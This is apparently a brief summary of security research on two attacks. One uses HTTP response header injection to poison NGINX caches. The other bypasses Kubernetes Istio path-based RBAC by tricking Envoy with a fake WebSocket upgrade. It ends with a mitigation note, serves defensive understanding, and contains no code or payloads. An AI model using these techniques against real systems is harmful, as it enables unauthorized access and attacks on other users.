"` The attack exploits a vulnerability in caching and bypassing Istio RBAC using HTTP response header injection. The attacker forces NGINX to cache responses, allowing them to target other users with vulnerabilities that are typically only self-exploitable. The second attack bypasses path-based RBAC rules in Kubernetes Istio, enabling full interaction with protected applications without interference from Istio. The vulnerability is exploited by injecting HTTP response headers into the response, causing NGINX to cache the response and provide it to another user. This can be achieved by tricking Envoy, a reverse proxy underpinning Istio, into believing that a connection has been successfully upgraded to a WebSocket connection, allowing data to be forwarded to the upstream application server without additional processing or RBAC validation. The best mitigation is to fully evaluate the applications themselves to ensure they do not contain HTTP response header injection vulnerabilities.